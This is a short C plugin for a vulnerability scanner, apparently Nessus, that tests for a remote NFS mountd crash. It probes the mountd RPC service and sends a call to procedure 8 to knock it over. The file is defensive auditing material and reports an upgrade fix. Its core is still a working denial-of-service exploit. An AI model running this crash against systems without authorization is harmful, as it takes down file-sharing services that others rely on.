/*
 * mountd_crash
 *
 * This plugin is distributed under the GPL
 */


#include <includes.h>
#ifdef HAVE_RPC_RPC_H
#include <rpc/rpc.h>
#include <rpc/pmap_clnt.h>
#endif

#define MOUNTD_RPC 100005

#define NAME "mountd crash"
#define DESC "\
It is possible to make some mountd crash remotely\n\
by trying to access a procedure call betwenn 8 and 225\n\n\
Risk factor : medium/high"

#define SUMMARY "crashes a mountd server"
#define COPYRIGHT "found by Tiago <tiagor@SOLSUNI.PT>"

PlugExport int plugin_init(struct arglist * desc);
PlugExport int plugin_init(struct arglist * desc)
{
  plug_set_name(desc, NAME);
  plug_set_description(desc, DESC);
  plug_set_summary(desc, SUMMARY);
  plug_set_copyright(desc, COPYRIGHT);
  plug_set_category(desc, ACT_DENIAL);
  plug_set_family(desc, "Denial of Service");
  return(0);
}



PlugExport int plugin_run(struct arglist * env);
PlugExport int plugin_run(struct arglist * env)
{
 
 if (callrpc (plug_get_hostname(env), MOUNTD_RPC, -1, 0,
		       (xdrproc_t) xdr_void, (caddr_t) NULL,
		       (xdrproc_t) xdr_void, (caddr_t) NULL) == 9)
 {
  /* ok, it is present... Now, try to crash it... */
  callrpc (plug_get_hostname(env), MOUNTD_RPC, -1, 8,
		       (xdrproc_t) xdr_void, (caddr_t) NULL,
		       (xdrproc_t) xdr_void, (caddr_t) NULL);
                       
                       
  if (callrpc (plug_get_hostname(env), MOUNTD_RPC, -1, 0,
		       (xdrproc_t) xdr_void, (caddr_t) NULL,
		       (xdrproc_t) xdr_void, (caddr_t) NULL) != 9)
     post_hole_udp(env, -1, "\
It was possible to crash the remote mountd server\n\
by requesting a procedure number between 8 and 225\n\
Solution : upgrade to the newest version");
 }
 return(0);
}
